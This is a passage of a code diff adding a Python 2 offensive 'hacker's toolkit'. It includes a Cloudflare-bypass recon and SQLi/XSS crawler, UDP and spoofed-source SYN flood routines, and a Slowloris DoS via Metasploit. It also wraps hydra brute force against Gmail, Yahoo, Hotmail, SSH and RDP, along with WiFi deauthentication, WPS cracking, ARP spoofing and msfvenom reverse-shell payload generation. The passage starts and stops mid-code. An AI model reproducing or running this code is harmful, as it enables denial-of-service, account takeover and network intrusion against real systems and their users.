{}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + 